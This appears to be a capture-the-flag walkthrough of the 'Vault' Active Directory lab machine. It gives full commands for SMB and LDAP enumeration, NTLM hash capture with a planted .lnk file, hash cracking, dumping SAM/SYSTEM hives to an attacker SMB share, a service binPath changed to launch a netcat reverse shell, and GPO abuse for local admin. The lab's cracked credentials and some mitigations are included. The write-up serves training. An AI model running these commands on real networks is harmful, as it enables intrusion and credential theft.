Vault

Introduction

In this walkthrough, I explored the Vault hard Active Directory machine. During enumeration, I discovered a writable SMB share. By placing a malicious .lnk (shortcut) file on the share, I was able to capture an NTLM hash for a local user. After cracking the hash and connecting via evil-winrm, I obtained an initial shell.

Post-exploitation, I identified two distinct privilege escalation paths:

1. GPO Abuse – My user had GenericWrite rights over the Default Domain Policy, which allowed me to inject a malicious startup script and gain full control.
2. SeRestorePrivilege Abuse – I also demonstrated privilege escalation by abusing this powerful right, typically reserved for backup operations.

Nmap

TCP

Run a quick Nmap TCP scan:

sudo nmap -sV $IP --open

UDP

Check top 100 UDP ports:

sudo nmap -sU -F $IP

Full Port Scan

sudo nmap -sV -sC -p- $IP -Pn -n -v --open

Services

Port 53

Domain: vault.offsec

• dig any DNS records

    dig any **vault.offsec** @$IP
  

  

• Zone Transfer

    dig axfr @$IP **vault.offsec**
  

  

Port 139/445 (SMB)

• smbclient

    smbclient -L //$IP/ -N
  

  

  • DocumentsShare

    We can access the share but it is empty but we can write there.

    

• nxc

    sudo nxc smb $IP -u 'guest' -p '' --shares
  

  

Port 135 (MSRPC)

rpcclient -U'%' $IP

NT_STATUS_ACCESS_DENIED

Port 3389 (RDP)

Nothing do do for now.

Port 5985 (WinRM)

Web

AD Initial Enumeration

User Enumeration

Unauthenticated

impacket-lookupsid 'vault.offsec/guest'@vault.offsec -no-pass | grep SidTypeUser | cut -d' ' -f 2 | cut -d'\' -f 2 | tee users

Port 389/3268

ldapsearch -x -H ldap://$IP -D '' -w '' -b "DC=vault,DC=offsec"

LDAP Anonymous Bind is not enabled.

Initial Attack Vectors

AS-REP Roasting

GetNPUsers.py vault.offsec/ -dc-ip $IP -no-pass -usersfile users

Password Spraying

sudo nxc smb $IP -u users -p users --continue-on-success

RDP Brute-Forcing

hydra -t 1 -l anirudh -P users rdp://$IP

Exploitation

I am gonna put .lnk file in a share and wait for connection.

Use this tool for create .lnk file:

And then run responder.

sudo responder -I tun0

Now let’s crack the user’s hash.

hashcat -m 5600 anirudh.hash /usr/share/wordlists/rockyou.txt

Now let’s check if the password was reused:

sudo nxc smb $IP -u users -p SecureHM --continue-on-success

Check shares again:

sudo nxc smb $IP -u anirudh -p SecureHM --shares

Checking access:

sudo nxc winrm $IP -u anirudh -p SecureHM

Shell as anirudh

1st way (SeBackupPrivilege & SeRestorePrivilege)

Checking for privileges I see that our user has many privileges.

Let’s use SeBackupPrivilege.

I tried first copying ntds but it returned the following error:

diskshadow.exe /s back_script.txt

set verbose on
set metadata C:\Windows\Temp\meta.cab
set context clientaccessible
set context persistent
begin backup
add volume C: alias cdrive
create
expose %cdrive% E:
end backup

When creating back_script.txt in Linux and transferring first run :

unix2dos back_script.txt

It doesn’t work for some reason.

reg save HKLM\SYSTEM SYSTEM.SAV
reg save HKLM\SAM SAM.SAV

File transfer:

sudo impacket-smbserver share -smb2support .

copy SAM.SAV \\192.168.45.159\share\SAM.SAV
copy SYSTEM.SAV \\192.168.45.159\share\SYSTEM.SAV

secretsdump.py -sam SAM.SAV -system SYSTEM.SAV LOCAL

impacket-psexec Administrator@$IP -hashes :608339ddc8f434ac21945e026887dc36

Trying to access the target using local admin hash doesn’t work.

Let’s abuse SeRestorePrivilege.

If we have SeRestorePrivilege that means most probably we are in Server Operators group, consequently that means most probably we can SERVICE_ALL_ACCESS over services running as Local System, you can first run .\winPEASany.exe quiet servicesinfo and identify such services and then change their config binpath to add us to local admin group or better give us a shell.

We are in Server Operators group.

I am gonna check my permissions over a service run as Local System

sc.exe sdshow "AppReadiness"

sudo python3 /opt/winsddl/sd.py --type=service "D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SO)”

As you can see we have SERVICE_START, SERVICE_STOP, SERVICE_CHANGE_CONFIG.

sc.exe config AppReadiness binPath= "cmd /c C:\tools\nc64.exe 192.168.45.159 4444 -e cmd.exe"

I am gonna upload nc64.exe and configure the service to run reverse shell with that.

As you can see we changed the service config, now let’s trigger it by stopping and restarting the service.

2nd way (GPO Abuse)

Upload SharpHound.exe and run it, then download zip file and open it in BloodHound.

.\SharpHound.exe -c All --zipfilename vault

We have GenericWrite over Default Domain Policy in this case we can use SharpGPOAbuse tool to change GPOs for privilege escalation. Let’s add our user to Administrators group:

.\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount anirudh --GPOName "Default Domain Policy”

After that run GPO Update command:

gpupdate /force

As you can see now we are local admin.

Now let’s use either evil-winrm or psexec to get higher level shell.

psexec.py vault.offsec/anirudh:SecureHM@$IP

Credentials

anirudh:SecureHM

Mitigation

• Audit and limit write access to SMB shares to prevent file-based attacks like .lnk payloads.
• Regularly review ACLs on GPOs to ensure only trusted users have GenericWrite or Modify permissions.
• Avoid assigning SeRestorePrivilege to standard users; restrict it to trusted backup accounts.
• Enable SMB signing and NTLM relay protections to prevent hash capturing and reuse.
• Monitor for suspicious .lnk file creations and policy modifications using event logging and SIEM tools.